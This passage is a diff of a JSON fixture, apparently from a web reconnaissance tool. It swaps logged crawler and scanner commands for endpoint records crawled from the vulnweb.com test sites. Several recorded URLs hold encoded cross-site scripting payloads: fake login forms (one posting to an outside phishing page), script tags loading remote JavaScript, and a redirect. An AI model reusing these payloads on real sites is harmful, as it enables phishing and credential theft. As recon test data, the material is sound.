"acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:06.995Z", + "response_time": 0.355324187, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 68, + "model": "startScan.endpoint", + "pk": 209, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_hakrawler_vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.100Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch", + "content_length": 3629, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:07.160Z", + "response_time": 0.355569923, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 69, + "model": "startScan.endpoint", + "pk": 210, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://vulnweb.com\" | waybackurls | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_waybackurls_vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.113Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F", + "content_length": 3613, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:07.275Z", + "response_time": 0.343376032, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 70, + "model": "startScan.endpoint", + "pk": 211, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_katana_vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.128Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D", + "content_length": 3635, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:07.410Z", + "response_time": 0.357381679, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 71, + "model": "startScan.endpoint", + "pk": 212, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gau_vulnweb.com.txt", - "return_code": 1, - "output": "", - "time": "2024-09-03T21:29:12.143Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%25253", + "content_length": 3647, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:14.194Z", + "response_time": 0.34573424799999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 72, + "model": "startScan.endpoint", + "pk": 213, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://www.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gospider_www.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.159Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2525u003C%2525s%2525v%2525g%2525%2520%2525o%2525n%2525l%2525o%2525a%2525d%2525%2525u003D%2525a%2525l%2525e%2525r%2525t%2525%28%25251%2525%29%2525%253E", + "content_length": 3937, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:14.332Z", + "response_time": 0.344656309, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 73, + "model": "startScan.endpoint", + "pk": 214, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://www.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_hakrawler_www.vulnweb.com.txt", - "return_code": 1, - "output": "", - "time": "2024-09-03T21:29:12.176Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EBitte%2Bloggen%2BSie%2Bsich%2Bein%2Bbevor%2BSie%2B%2Bfortfahren%3A%2B%253Cform%2Baction%2B%253D%2522destination%2Eaps%2522%253E%253Ctable%253E%2B%253Ctr%253E%2B%253Ctd%253ELogin%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253C%2Ftd%253E%2B%253C%2Ftr%253E%2B%253Ctr%253E%2B%253Ctd%253EPasswort%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253C%2Ftd%253E%2B%253C%2Ftr%253E%253C%2Ftable%253E%2B%253Cinput%2Btype%253Dsubmit%2Bvalue%253Dlogin%253E%253C%2Fform%253E", + "content_length": 4797, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:14.456Z", + "response_time": 0.348075872, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 74, + "model": "startScan.endpoint", + "pk": 215, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://www.vulnweb.com\" | waybackurls | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_waybackurls_www.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.191Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253C%2520form%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2B%2520length%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2520%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%252Ftd%253E%253C%252Ftr%253E%253C%252Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%2520%253DLOGIN%253E%253C%252Fform%253E", + "content_length": 4823, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:14.576Z", + "response_time": 0.343116014, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 75, + "model": "startScan.endpoint", + "pk": 216, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://www.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_katana_www.vulnweb.com.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:29:12.207Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2B", + "content_length": 3731, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:14.694Z", + "response_time": 0.353196356, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 76, + "model": "startScan.endpoint", + "pk": 217, "fields": { "scan_history": 1, - "activity": 5, - "command": "echo \"http://www.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_gau_www.vulnweb.com.txt", - "return_code": 1, - "output": "", - "time": "2024-09-03T21:29:12.222Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogi", + "content_length": 3709, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:14.809Z", + "response_time": 0.35737487199999995, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 77, + "model": "startScan.endpoint", + "pk": 218, "fields": { - "scan_history": null, - "activity": null, - "command": "tlsx -san -cn -silent -ro -host vulnweb.com -o /tmp/ip_domain_tlsx.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:33:01.109Z" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252F", + "content_length": 4035, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:14.924Z", + "response_time": 0.34056039600000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 78, + "model": "startScan.endpoint", + "pk": 219, "fields": { "scan_history": 1, - "activity": 5, - "command": "cat /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_* > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/#1_fetch_url.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:35:38.599Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp", + "content_length": 3897, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:15.043Z", + "response_time": 0.35268202200000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 79, + "model": "startScan.endpoint", + "pk": 220, "fields": { "scan_history": 1, - "activity": 5, - "command": "cat /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/input_endpoints_fetch_url.txt >> /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/#1_fetch_url.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:35:38.631Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C", + "content_length": 4245, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:15.183Z", + "response_time": 0.35043461600000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 80, + "model": "startScan.endpoint", + "pk": 221, "fields": { "scan_history": 1, - "activity": 5, - "command": "sort -u /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/#1_fetch_url.txt -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/#1_fetch_url.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:35:38.659Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%25253", + "content_length": 4075, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:15.303Z", + "response_time": 0.356860683, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 81, + "model": "startScan.endpoint", + "pk": 222, "fields": { "scan_history": 1, - "activity": 5, - "command": "cat /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/#1_fetch_url.txt | grep -Eiv \"\\.(png|jpg|jpeg|gif|mp4|mpeg|mp3).*\" > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_filtered.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:35:38.696Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Byour%2Bform%2Bfacebbok%2Bbelow%2Bbefore%2Bproceeding%3A%253Cform%2Baction%253D%2522http%3A%2F%2Fwww%2Evineyarddowntown%2Eorg%2Fpdf%2Fphish%2Ephp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%2Ftd%253E%253C%2Ftr%253E%253Ctr%253E%253Ctd%253EPassword%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%2Ftd%253E%253C%2Ftr%253E%253C%2Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%253DLOGIN%253E%253C%2Fform%253E", + "content_length": 4865, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:15.430Z", + "response_time": 0.34832276300000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 82, + "model": "startScan.endpoint", + "pk": 223, "fields": { "scan_history": 1, - "activity": 5, - "command": "mv /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_filtered.txt /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/#1_fetch_url.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:35:38.727Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fcfy%2Ejs%2522%253E%253C%252Fscript%253E", + "content_length": 3821, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:15.547Z", + "response_time": 0.356238649, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 106, + "model": "startScan.endpoint", + "pk": 224, "fields": { "scan_history": 1, - "activity": 14, - "command": "nuclei -j -irr -l /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/urls_unfurled.txt -c 50 -retries 1 -rl 150 -timeout 5 -silent -t /home/rengine/nuclei-templates -severity medium", - "return_code": 0, - "output": null, - "time": "2024-09-03T22:02:49.873Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinp", + "content_length": 4417, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:15.667Z", + "response_time": 0.356774004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 117, + "model": "startScan.endpoint", + "pk": 225, "fields": { "scan_history": 1, - "activity": null, - "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 7 -json -l /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/httpx_input.txt -silent", - "return_code": 0, - "output": "{\"timestamp\":\"2024-09-03T22:13:05.027538389Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com\",\"input\":\"http://vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"341.066989ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T22:13:05.034995861Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com\",\"input\":\"http://www.vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"347.273586ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T22:13:05.035316875Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com\",\"input\":\"http://testasp.vulnweb.com\",\"title\":\"acuforum forums\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/\",\"time\":\"347.420538ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":328,\"lines\":46,\"status_code\":200,\"content_length\":3538,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T22:13:05.036463189Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com\",\"input\":\"http://testhtml5.vulnweb.com\",\"title\":\"SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"342.066622ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":1483,\"lines\":164,\"status_code\":200,\"content_length\":6940,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T22:13:05.053531252Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com\",\"input\":\"http://rest.vulnweb.com\",\"title\":\"Acunetix Vulnerable REST API\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"35.81.188.86\",\"path\":\"/\",\"time\":\"367.185091ms\",\"a\":[\"35.81.188.86\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\",\"PHP:7.1.26\"],\"words\":1397,\"lines\":138,\"status_code\":200,\"content_length\":3555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T22:13:05.066012087Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com\",\"input\":\"http://testphp.vulnweb.com\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"374.757261ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T22:13:05.228722074Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com\",\"input\":\"http://testaspnet.vulnweb.com\",\"title\":\"acublog news\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/\",\"time\":\"513.247119ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":774,\"lines\":89,\"status_code\":200,\"content_length\":14081,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n", - "time": "2024-09-03T22:12:53.901Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fnip%2Ejs%2522%253E%253C%252Fscript%253E", + "content_length": 3821, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:15.790Z", + "response_time": 0.349715029, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 118, + "model": "startScan.endpoint", + "pk": 226, "fields": { "scan_history": 1, - "activity": null, - "command": "rm /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/httpx_input.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T22:13:05.280Z" - } -}, -{ - "model": "startScan.command", - "pk": 119, - "fields": { - "scan_history": null, - "activity": null, - "command": "gf -list", - "return_code": 0, - "output": "\naws-keys\nbase64\ncors\ndebug-pages\ndebug_logic\nfirebase\nfw\ngo-functions\nhttp-auth\nidor\nimg-traversal\ninterestingEXT\ninterestingparams\ninterestingsubs\nip\njson-sec\njsvar\nlfi\nmeg-headers\nphp-curl\nphp-errors\nphp-serialized\nphp-sinks\nphp-sources\nrce\nredirect\ns3-buckets\nsec\nservers\nsqli\nssrf\nssti\nstrings\ntakeovers\nupload-fields\nurls\nxss", - "time": "2024-09-03T23:36:10.771Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fsc%2Ejs%2522%253E%253C%252Fscript%253E", + "content_length": 3819, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:15.907Z", + "response_time": 0.343390536, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 1, + "model": "startScan.endpoint", + "pk": 227, "fields": { - "name": "DreamWeaver" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%3D%253Cscript%253Elocation%2Ehref%3D%2522http%3A%2F%2Fgoo%2Egl%2Fz4LTEG%2522%3B%253C%252Fscript%253E", + "content_length": 3837, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:16.024Z", + "response_time": 0.353026695, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 2, + "model": "startScan.endpoint", + "pk": 228, "fields": { - "name": "Nginx:1.19.0" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DMert", + "content_length": 3643, + "page_title": "acuforum register", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:16:16.156Z", + "response_time": 0.357063072, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.technology", - "pk": 3, + "model": "startScan.endpoint", + "pk": 229, "fields": { - "name": "PHP:5.6.40" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": 